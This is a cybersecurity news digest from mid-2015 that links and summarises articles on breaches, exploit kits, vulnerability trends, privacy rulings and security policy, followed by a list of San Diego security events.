How safe is the software you use? Do you have a system in place to identify vulnerabilities and patch them when they are discovered? How quickly do you react to vulnerability reports? There’s evidence that software vulnerabilities are on the rise, and few companies are taking the necessary action to combat them. There was some worrying news in the recent Secunia Vulnerability Review 2015. The number of recorded vulnerabilities hit a record high of 15,435 last year, up 18% from 2013. The vulnerability count has increased 55% in the last five years. The report also found a rise in the number of zero-day vulnerabilities with 20 being uncovered in the 50 most popular programs. These are vulnerabilities that have already been exploited by hackers before being made public or being patched.

http://www.networkworld.com/article/2953304/security/software-vulnerabilities-on-the-rise-record-high-report.html

 

+ Here’s what your stolen identity goes for on the Internet’s black market

The going rate for a stolen identity is about twenty bucks. Tens of millions of people have lost their private information in data breaches over the past few years. But what happens after that, how the data are leveraged for financial gain, remains murky. Many of those stolen records end up for sale on the anonymous, seedy area of the internet commonly known as the dark web. Analyzing the sale of those records sheds some light on the vibrant market for stolen identities. On the dark web’s eBay-like marketplaces, the full set of someone’s personal information (identification number, address, birthdate, etc.) is known as “fullz.” We analyzed listings for individual fullz that were put up for sale over the past year, using data collected by Grams, a search engine for the dark web. Our question: How much is a stolen identity worth?

http://qz.com/460482/heres-what-your-stolen-identity-goes-for-on-the-internets-black-market/

 

+ DHS Secretary: I ‘probably’ should have stopped using Gmail sooner

Department of Homeland Security Secretary Jeh Johnson yesterday confirmed that he and 28 senior staffers have been using private web-based email on work computers for the last year. Private email was banned from DHS computers in April 2014, after Office of Personnel Management (OPM) computers were breached. Now that he’s been caught by media for bending the rules, Johnson said that he plans to use his smartphone to access his personal Gmail account from now on. Speaking at a Politico event, Johnson said that he had obtained a waiver from DHS’ chief information officer to continue accessing webmail from work.

http://www.infosecurity-magazine.com/news/dhs-secretary-probably-stopped/


+ Flash zero-day monster Angler dominates exploit kit crime market

SophosLabs researcher Fraser Howard says the Angler exploit kit is dominating the highly competitive underground malware market, exploding from a quarter to 83 percent of market share within nine months. The blitzkrieg occurred between September and May this year. Angler emerged in 2013 to become one of the most capable exploit kits. Like its rivals, the code is designed to be an all-in-one ram-rod hacking package that web scum can use to get their malware, ransomware, and other net nasties past user machine defenses.

http://www.theregister.co.uk/2015/07/23/sophos_angler_ek/


+ IARPA funds program to predict next wave of cyberattacks

To date, cybersecurity has largely been reactionary – stopping infiltrators before they can do too much damage to a system. A new initiative from the Intelligence Advanced Research Projects Agency is trying to get ahead of the next attack by combining traditional security techniques with information culled from unconventional sources to block currently unknown threats. The Cyberattack Automated Unconventional Sensor Environment (CAUSE) is a framework for coupling known threat indicators – whether internal or through shared information environments – with external information sources such as social media and search engine trends.

http://www.federaltimes.com/story/government/cybersecurity/2015/07/20/iarpa-cyberattack-unconventional-sensors/30415367/


+ Facebook just lost a search warrant fight, and that’s bad news for privacy

In a setback for privacy advocates, an appeals court on Tuesday ruled that law enforcement can order tech companies to hand over data on hundreds of users in one swoop – and the companies can’t challenge the warrant or even warn users about the search. The case in question involves an investigation by New York prosecutors into state employees who scammed the disability system. The investigation, which saw 134 people indicted, was partly based on scanning Facebook for posts that showed the employees doing sports or other physical activities.

http://fortune.com/2015/07/22/facebook-warrants/


+ Google Maps’ new ‘Your Timeline’ feature helps you track your travel history

Google is rolling out a new “Your Timeline” feature for Maps over the coming weeks that is certain to thrill some folks, and horrify others. The feature allows you to view your entire location history on Google Maps based on data pulled from your devices when signed in to your Google account. Google calls Your Timeline “a useful way to remember and view the places you’ve been on a given day, month or year.” You can already view your location history by diving into the My Account dashboard for your Google account. The difference now is that it will be available in a more user-friendly manner right from the Google Maps menu on the desktop or Android.

http://www.pcworld.com/article/2951099/web-applications/google-maps-new-your-timeline-feature-helps-you-track-your-travel-history.html

+ Neiman Marcus case a reminder to check your cyber coverage

It’s a decision that should send major corporations to double-check their cyberinsurance: a federal appeals court ruled Monday that retail customers could go ahead and file a class-action lawsuit against Neiman Marcus in the wake of last year’s data breach. Previously, such cases were dismissed because the customers hadn’t suffered any actual damages.

http://www.csoonline.com/article/2954615/cyber-attacks-espionage/neiman-marcus-case-a-reminder-to-check-your-cyber-coverage.html#tk.rss_news

+ Will the Real Victim Stand Up?

Class action suits over data breaches continue to be met with conflicting results — but what effect does this have on corporations’ responsibility for consumer data protection?…

https://digitalguardian.com/blog/will-real-victim-stand


+ More Than a Third of Employees Willing to Sell Private Company Data and IP

Clearswift survey confirms that organizations must have data protection policies in place that safeguard against both malicious and inadvertent insider threats…

http://www.businesswire.com/news/home/20150729005410/en/Research-Reveals-Employees-Sell-Private-Company-Data#.Vb69c_nLfGm


+ Security awareness to benefit from government incentives, says former GC of Verizon

Pricey government fines will force management to think security…

http://www.channelnomics.com/channelnomics-us/news/2419852/security-awareness-to-benefit-from-government-incentives-says-former-gc-of-verizon


+ State of Application Security Report At-A-Glance

The illegal reproduction and distribution of copyrighted material on the Web is extensive and growing rapidly…

https://www.arxan.com/resources/state-of-application-security/

https://www.arxan.com/wp-content/uploads/2015/06/State-of-Application-Security-Report-Vol-4-2015.pdf


+ Beware the Internet of Things — it’s early, security sucks and the C-Suite doesn’t care

The Internet of Things is one of those buzzphrases that sets all sorts of unrealistic expectations. There are other concerns though, many of which hinge around security…

http://diginomica.com/2015/07/28/beware-the-internet-of-things-its-very-early-and-security-sucks/#.Vb7BZvnLfGn


+ Cybersecurity Technology Integration Changes Everything

Based upon current and future cybersecurity technology integration trends, CISOs are adjusting budgets, organizations, skills, and vendor choices. Even industry analysts are impacted by cybersecurity technology integration…

http://www.networkworld.com/article/2953490/cisco-subnet/cybersecurity-technology-integration-changes-everything.html


+ Best Practices to Protect You, Your Network, and Your Information

During NCCIC’s recent work, following best practices proved extremely effective in protecting networks, the information residing on them, and the equities of information owners. Cybersecurity is a risk management issue. Our experience demonstrates that individuals and organizations may reduce risk when they implement cybersecurity best practices.

https://www.us-cert.gov/ncas/current-activity/2015/07/31/Best-Practices-Protect-You-Your-Network-and-Your-Information


+ The First 24 Hours In The Wake Of A Data Breach

There is a direct correlation between how quickly an organization can identify and contain a data breach and the financial consequences that may result.

http://www.darkreading.com/attacks-breaches/the-first-24-hours-in-the-wake-of-a-data-breach/a/d-id/1321426


+ Wearable health technology and HIPAA: What is and isn’t covered

http://searchhealthit.techtarget.com/feature/Wearable-health-technology-and-HIPAA-What-is-and-isnt-covered


+ Cyber-boom or cyber-bubble?

Internet security has become a bigger export earner than arms…

http://www.economist.com/news/business/21660112-internet-security-has-become-bigger-export-earner-arms-cyber-boom-or-cyber-bubble#3A3O5Av8JAG4fDkj.99


+ Stagefright Android Bug: ‘Heartbleed for Mobile’ But Harder To Patch

Critical vulnerability in Android’s multimedia playback engine is easy to exploit, requires NO user interaction, and affects 95 percent of Android devices. Just text their phone!!

http://www.darkreading.com/vulnerabilities---threats/stagefright-android-bug-heartbleed-for-mobile-but-harder-to-patch/d/d-id/1321477


+ Startup ‘Stealth Worker’ Matches Businesses With Security Talent

New online service helps businesses looking for part-time security professionals fill specific job needs…

http://www.darkreading.com/operations/startup-stealth-worker-matches-businesses-with-security-talent/d/d-id/1321550?


2  +++++++

+ Bill would mandate agencies use Einstein program

Could a change to federal law help prevent breaches such as those at the Office of Personnel Management that exposed the private information of more than 22 million individuals? Sen. Ron Johnson thinks so. Johnson, the South Dakota Republican who chairs the Senate Committee on Homeland Security and Governmental Affairs, and the panel’s ranking Democratic member, Tom Carper of Delaware, introduced on July 27 the Federal Cybersecurity Enhancement Act of 2015, which would require federal agencies to implement the government’s Einstein intrusion protection program.

http://www.govinfosecurity.com/bill-would-mandate-agencies-use-einstein-program-a-8436


+ What federal employees really need to worry about after the Chinese hack

A new government review of what the Chinese hack of sensitive security clearance files of 21 million people means for national security is in – and some of the implications are quite grave. Covert intelligence officers and their operations could be exposed and high-resolution fingerprints could be copied by criminals, the Congressional Research Service disclosed in an analysis of one of the most harmful cyber thefts in U.S. history. Since the breach was disclosed in June, the response to the compromised background investigation files and a separate intrusion into personnel data of 4.2 million people has focused mainly on the risk of identity theft.

http://www.washingtonpost.com/blogs/federal-eye/wp/2015/07/29/stolen-fingerprints-blown-spy-covers-the-risks-to-national-security-from-the-chinese-employee-hack/


+ How the way you type can shatter anonymity – even on Tor

Security researchers have refined a long-theoretical profiling technique into a highly practical attack that poses a threat to Tor users and anyone else who wants to shield their identity online. The technique collects user keystrokes as an individual enters usernames, passwords, and other data into a website. After a training session that typically takes less than 10 minutes, the website (or any other site connected to the website) can then determine with a high degree of certainty when the same individual is conducting subsequent online sessions. The profiling works by measuring the minute differences in the way each person presses keys on computer keyboards. Since the pauses between keystrokes and the precise length of time each key is pressed are unique for each person, the profiles act as a sort of digital fingerprint that can betray its owner’s identity.

http://arstechnica.com/security/2015/07/how-the-way-you-type-can-shatter-anonymity-even-on-tor/


+ Daimler says hacking concerns drive Nokia maps bid

Daimler Chief Executive Dieter Zetsche said a desire to have better control over data security was one of the reasons Mercedes was bidding for Nokia’s high-definition mapping business. In a call to discuss second-quarter results, Zetsche was asked whether he was concerned about hacker attacks on Mercedes-Benz cars. “You can see from reading the papers that we are trying to acquire a platform together with our German competitors, to gain control over the platform which enables autonomous driving, for exactly these reasons,” Zetsche said.

http://www.reuters.com/article/2015/07/23/us-daimler-nokia-security-idUSKCN0PX0QP20150723


+ IG: Lack of cybersecurity staff, technology left USPS vulnerable to 2014 attack

A lack of properly trained cybersecurity workers and a comprehensive cyber strategy were major reasons why the U.S. Postal Service experienced a data breach late last year, a new report found. In November 2014, when data on 2.9 million USPS employees was compromised, the agency was relying on basic cybersecurity protections and untrained workers to keep its systems safe, a July 17 report from the agency’s inspector general found. “At the time the intrusion was identified, Postal Service leadership had not emphasized cybersecurity, as evidenced by its undertrained employees, lack of accountability for risk acceptance decisions, ineffective collaboration among cybersecurity teams, and continued operation of unsupported systems,” the report states.

http://www.fiercegovernmentit.com/story/ig-lack-cybersecurity-staff-technology-left-usps-vulnerable-2014-attack/2015-07-23


+ Senate committee poised to upgrade agency anti-hacking laws, again

Federal data security legislation enacted in 2002 that was overhauled last December already is due for an upgrade owing to a confluence of events, say the bill’s authors. First, the Department of Homeland Security laid out a course to wrap its intrusion-thwarting system around all federal networks this year. But DHS had trouble convincing agencies it was legal to let the department scan their Internet traffic for threats. Then came hacks into ill-guarded federal and contractor networks that potentially yielded enough information to bribe government personnel for secrets. Both incidents illustrated that DHS – supposedly the civilian cybersecurity operations center – does not have enough authority to protect other agencies’ networks. Now, the Senate Homeland Security and Governmental Affairs Committee, which pushed through cyber reforms in 2014, is proposing new hacker-prevention legislation.

http://www.nextgov.com/cybersecurity/2015/07/senate-committee-poised-upgrade-agency-anti-hacking-laws-again/118512/


+ Most Major Financial Hacks Completely Covered Up

Lieberman Software survey reveals most companies are persistently targeted by cyber attacks and the public only finds out about a small portion of security breaches…

http://www.darkreading.com/most-major-financial-hacks-completely-covered-up/d/d-id/1321143


+ The new Microsoft browser has brand new security issues

Yesterday’s release of Microsoft’s Windows 10 saw Microsoft introduce a new browser to replace the aging Internet Explorer. Called Microsoft Edge, it’s supposed to be faster and more secure than its predecessor. However, according to several tech reviews that came out in the hours since its release, cyberattacks are still very possible on Edge…

http://www.komando.com/happening-now/318789/the-new-microsoft-browser-has-brand-new-security-issues


+ Hackers give up when they go up against this cybersecurity company

In conversation with George Kurtz, CEO of CrowdStrike…It’s not every day that a company can compel hackers to give up. Yet that’s exactly what CrowdStrike managed to do earlier this year.

http://fortune.com/2015/07/29/crowdstrike-cybersecurity-george-kurtz/


+ Clearer, More Stringent Cybersecurity Rules for Government Contractors

The White House wants government contractors to have strong, clear, and consistent rules for protecting sensitive data. Recent breaches underscore problems in the current contractor arrangements, including inconsistent data security standards in federal contracts as well as in various guidelines established by different agencies. A proposal for new rules will soon be available for public comment.

http://thehill.com/policy/cybersecurity/249752-white-house-wants-consistent-cyber-rules-for-contractors

[Note: Many government RFPs, and probably most of the large ones, include FISMA requirements. The issue is not the requirements; it is the lack of assessing whether the contractor actually meets the requirements – same as the problem at Government agencies. The White House should look at the FedRAMP program, which has a consistent, well-thought-out way of defining, and more importantly assessing, the security of cloud service providers who want to do business with the Federal Government….]


+ Can thinking like cyberattackers improve organizations’ security?

Getting in the minds of cyberattackers can help organizations mount better defenses against attacks. Here are some ways to accomplish this…

http://searchsecurity.techtarget.com/answer/Can-thinking-like-cyberattackers-improve-organizations-security


+ Securing connected machines, what is there to know?

Companies looking to secure their networks should verify and minimize the visibility of their ICS resources over the internet. Due to the growing number of advanced threats, collecting and analyzing threat intelligence can play a valuable role in providing security teams with detailed information about the attack vectors.

http://www.m2mnow.biz/2015/07/29/35442-securing-connected-machines-what-is-there-to-know/


+ 10 Security Mistakes Nearly Everyone’s Guilty Of

When it comes to data security, attackers continue to exploit the biggest weakness of all — people. ESET Ireland looks at 10 security mistakes humans continue to make on a daily basis… (poor hygiene, lax access control, etc.)

http://www.informationsecuritybuzz.com/10-security-mistakes-nearly-everyones-guilty-of/


+ A Security Awareness and Training Policy Checklist

Your organization may already have a security training and awareness (STA) program, or (this is less likely nowadays) you may have to build one from scratch…

http://resources.infosecinstitute.com/a-security-awareness-and-training-policy-checklist/


3  +++++++

+ Code Theft: Protecting IP At The Source

Your corporate assets are at risk and every day that you avoid taking action shortens the time until your IP will be leaked. Here are six steps toward better data security…

http://www.darkreading.com/endpoint/code-theft-protecting-ip-at-the-source/a/d-id/1321490?


+ Nearly all Americans support and want retaliation for cyberattacks (hacking back is illegal!)

The vast majority of Americans are calling for retaliation in the wake of cyberattacks that compromise sensitive government data. Security company Vormetric coordinated with an outside firm in July to poll 1,026 nationally representative U.S. adults on whether they believed action is necessary against a foreign country that breaches U.S. government data; 92 percent said yes. That said, most Americans prefer more passive action with 45 percent saying the government should initiate talks between the sitting president and the attacking country’s leaders to prevent further data breaches, and 36 percent want to impose trade sanctions on a country’s goods.

http://www.scmagazine.com/vormetric-survey-polls-americans-on-cyberattack-government-reactions/article/429049/


+ Researchers analyze faulty new Linux backdoor

Researchers at Dr. Web have discovered a faulty trojan designed as a backdoor for Linux that could also target Windows systems. Identified as Linux.BackDoor.Dklkt.1, the trojan – possibly of Chinese origin – is designed to perform functions typical of file managers, SOCKS proxy servers, and remote shells; however, it ignores several of its commands due to poor design, a post indicated. Some of the commands the trojan awaits include change remark, open shell, run an application, start proxy, exit, reboot and turn off a computer. Some of the commands that are ignored include update itself, receive user data and remove itself.

http://www.scmagazine.com/researchers-at-dr-web-have-discovered-a-faulty-trojan-designed-as-a-backdoor-for-linux/article/428793/


+ China-tied hackers that hit U.S. said to breach United Airlines

The hackers who stole data on tens of millions of U.S. insurance holders and government employees in recent months breached another big target at around the same time — United Airlines. United, the world’s second-largest airline, detected an incursion into its computer systems in May or early June, said several people familiar with the probe. According to three of these people, investigators working with the carrier have linked the attack to a group of China-backed hackers they say are behind several other large heists — including the theft of security-clearance records from the U.S. Office of Personnel Management and medical data from health insurer Anthem Inc.

http://www.bloomberg.com/news/articles/2015-07-29/china-tied-hackers-that-hit-u-s-said-to-breach-united-airlines


+ Sun Tzu 2.0: Is cyberwar the new warfare?

For better or worse, the multitude of networks that help keep our world interconnected is a much different place today than it was in the past. Paradoxically, the networks that provide users with a wealth of information, transactional services and the like have also been used as a battlefield to disrupt our everyday lifestyle.

http://www.net-security.org/article.php?id=2344


+ When a cyber attack hits: Who’s in charge?

It takes a combination of specialties to handle a data security incident in a way that fully protects the organization…

http://www.healthcareitnews.com/blog/when-cyber-attack-hits-whos-charge


+ For DOD, building the cyber force is a team game

The Defense Department is still in the relatively nascent stages of building its cyber mission force, but it has made some progress in recruitment, training and defining roles. In some ways, it has come down to team building…

http://defensesystems.com/articles/2015/07/30/building-cyber-mission-force.aspx


+ Threat Report Identifies Security Risks of Popular Websites and Software

News and entertainment websites unknowingly host more than 50 percent of malvertisements; Flash exploits increase 60 percent and ransomware increases 80 percent since 2014…

http://www.streetinsider.com/Press+Releases/Bromium+Threat+Report+Identifies+Security+Risks+of+Popular+Websites+and+Software/10760919.html


+ Researchers Steal Door Badge Credentials Using Smartphone Bluetooth

Weakness in facility access control protocol leaves most badge-in systems open to attack…

http://www.darkreading.com/researchers-steal-door-badge-credentials-using-smartphone-bluetooth/d/d-id/1321510


+ Accuvant researchers to release open source RFID access tool

Security researchers have long known about the vulnerabilities of RFID… an open source piece of hardware that can be used to circumvent these readers.

http://www.csoonline.com/article/2953296/physical-security/accuvant-researchers-to-release-open-source-rfid-access-tool.html


+ Windows 10 Shares Your Wi-Fi With Contacts

Starting today, Microsoft is offering most Windows 7 and Windows 8 users a free upgrade to the software giant’s latest operating system — Windows 10. But there’s a very important security caveat that users should know about before transitioning to the new OS: Unless you opt out, Windows 10 will by default share your Wi-Fi network password with any contacts you may have listed in Outlook and Skype — and, with an opt-in, your Facebook friends!…

http://krebsonsecurity.com/2015/07/windows-10-shares-your-wi-fi-with-contacts/


+ Phishing Up 74% in Q2 2015, Says Infoblox DNS Threat Index

http://www.tripwire.com/state-of-security/security-data-protection/cyber-security/phishing-up-74-in-q2-2015-reveals-infoblox-dns-threat-index/


+ One-Third of Industrial Control Systems Breached in Last Twelve Months

According to a report from SANS on the state of Industrial Control System (ICS) security, one-third of respondents (34%) said their systems had been infiltrated or infected in an attack at least twice in the last twelve months.

http://darkmatters.norsecorp.com/2015/07/01/one-third-of-industrial-control-systems-breached-in-last-twelve-months/


+++  SD/SoCAL security events / opportunities +++

+ CyberTECH events / networking / startups / etc. — THE cyber happening place in SD!!!

Join their Meetup Group for the latest event information! The definition of “Cyber KEWEL”

http://www.meetup.com/cybertech/


AUG

13 – ISC2 – 6PM – Care Fusion – Cyber Security In Healthcare: Just What The Doctor Ordered? David Scott.

Location – BAH (Suite 200), 4055 Hancock Street, San Diego, CA 92110 USA


20 – ISACA – noon – Running InfoSec for America’s Finest City – Gary Hayslip – Coleman University

http://isaca-sd.org/event/august-2015-isaca-san-diego-chapter-meeting/


27 – ISSA – (4th Thurs at 11:30) – “Cybercrime: Operational Risk or Overblown Threat” – Stephen Cobb

(at ADM Baker field clubhouse)

http://www.sdissa.org/


---- Global Cyber events:

https://www.secureworldexpo.com/

https://heimdalsecurity.com/blog/44-relevant-cyber-security-conferences-around-the-world/

http://thecyberwire.com/events.html
